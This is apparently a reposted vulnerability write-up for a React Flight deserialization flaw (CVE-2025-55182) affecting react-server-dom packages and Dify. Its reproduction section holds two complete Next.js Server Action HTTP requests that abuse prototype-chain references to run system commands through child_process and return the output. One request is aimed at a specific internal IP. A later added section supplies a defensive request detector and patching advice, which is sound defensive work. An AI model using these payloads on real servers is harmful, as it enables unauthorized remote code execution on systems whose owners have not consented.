React Flight Deserialization Vulnerability (CVE-2025-55182)
Statement
This article is copyrighted by its original author; reproduction without permission is prohibited.
Vulnerability mechanism
React Flight's deserialization performs no security validation on the references it resolves, so an attacker can construct a prototype-chain reference that reaches child_process and executes system commands.
Affected versions
react-server-dom-parcel (19.0.0, 19.1.0, 19.1.1 and 19.2.0)
react-server-dom-webpack (19.0.0, 19.1.0, 19.1.1 and 19.2.0)
react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1 and 19.2.0)
Affected applications:
v1.1.2 <= dify <= v1.10.1
Prerequisites
None
Reproduction
Note
For /xxx, prefer a route that already exists on the target React Server.
Output echoed in the response body, base64-encoded:
POST /xxx HTTP/1.1
Host:
Next-Action: x
X-Nextjs-Request-Id: ygdkgols
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: 0OySzliul7lMdEUPchXuS
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then":"$1:__proto__:then",
"status":"resolved_model",
"reason":-1,
"value":"{\"then\":\"$B1337\"}",
"_response":{
"_prefix":"const c = Buffer.from('<@base64>ls</@base64>', 'base64').toString();var r=process.mainModule.require('child_process').execSync(c).toString().trim();var o = Buffer.from(r).toString('base64');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `${o}`});",
"_chunks":"$Q2",
"_formData":{
"get":"$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Output echoed in a response header:
POST /xxx HTTP/1.1
Host: 172.16.31.22
Next-Action: x
X-Nextjs-Request-Id: ygdkgols
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: 0OySzliul7lMdEUPchXuS
Content-Length: 850
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then":"$1:__proto__:then",
"status":"resolved_model",
"reason":-1,
"value":"{\"then\":\"$B1337\"}",
"_response":{
"_prefix":"const c = Buffer.from('<@base64>ls</@base64>', 'base64').toString();var r=process.mainModule.require('child_process').execSync(c).toString().trim();var o = Buffer.from(r).toString('base64');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${o};307;`});",
"_chunks":"$Q2",
"_formData":{
"get":"$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Analysis
None yet.
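As an added example (not code from the original post or the React project), a request-side detector a defender could run in a WAF or middleware: it flags Next.js Server Action requests whose Flight references resolve a property path through __proto__, constructor or prototype, which is what both requests above rely on. The header set and multipart body below are constructed for the demo; the function names are my own.

```javascript
// Flight references look like "$<id>" or "$<id>:<prop>:<prop>...". The path is resolved
// against an already-decoded chunk, so a path through __proto__ / constructor /
// prototype reaches objects the request never defined (e.g. Function via
// "$1:constructor:constructor"). Legitimate clients never send such paths.
const FLIGHT_REF = /^\$[A-Za-z@]?\d+(?::(.+))?$/;
const DANGEROUS = new Set(["__proto__", "constructor", "prototype"]);

function dangerousRef(str) {
  const m = FLIGHT_REF.exec(str);
  if (!m || !m[1]) return null;                       // plain "$1", "$Q2", "$@0": fine
  return m[1].split(":").some((s) => DANGEROUS.has(s)) ? str : null;
}

// Walk a decoded form field (JSON tree or plain string) and collect dangerous refs.
function collectRefs(node, out) {
  if (typeof node === "string") {
    const hit = dangerousRef(node);
    if (hit) out.push(hit);
    // Flight also nests JSON inside strings (the "value" field above); look inside.
    if (/^[\[{]/.test(node.trim())) {
      try { collectRefs(JSON.parse(node), out); } catch { /* not JSON, ignore */ }
    }
  } else if (node && typeof node === "object") {
    for (const v of Object.values(node)) collectRefs(v, out);
  }
  return out;
}

// Split a multipart/form-data body into part bodies (part headers dropped).
function multipartFields(body, boundary) {
  return body.split(`--${boundary}`).slice(1)
    .filter((p) => !/^--/.test(p))                    // drop the closing "--" marker
    .map((p) => p.replace(/^\r?\n/, "").split(/\r?\n\r?\n/).slice(1).join("\n\n").trim());
}

// Returns { suspicious, refs } for one request; only Server Action posts are inspected.
function scanServerActionRequest(headers, body) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const boundary = /boundary=(.+)$/.exec(h["content-type"] || "")?.[1];
  if (!("next-action" in h) || !boundary) return { suspicious: false, refs: [] };
  const refs = [];
  for (const field of multipartFields(body, boundary)) collectRefs(field, refs);
  return { suspicious: refs.length > 0, refs };
}

// Constructed sample (hypothetical boundary, stripped-down fields from the requests above).
const SAMPLE_HEADERS = { "Next-Action": "x",
  "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryDEMO" };
const SAMPLE_BODY = ["------WebKitFormBoundaryDEMO", 'Content-Disposition: form-data; name="0"', "",
  '{"then":"$1:__proto__:then","status":"resolved_model","_formData":{"get":"$1:constructor:constructor"}}',
  "------WebKitFormBoundaryDEMO", 'Content-Disposition: form-data; name="1"', "", '"$@0"',
  "------WebKitFormBoundaryDEMO--", ""].join("\r\n");
console.log(scanServerActionRequest(SAMPLE_HEADERS, SAMPLE_BODY));
```

Blocking on this signature stops the published payloads, but the fix is upgrading to a patched react-server-dom-* release; the check is a stopgap and a source of alerts, not a replacement.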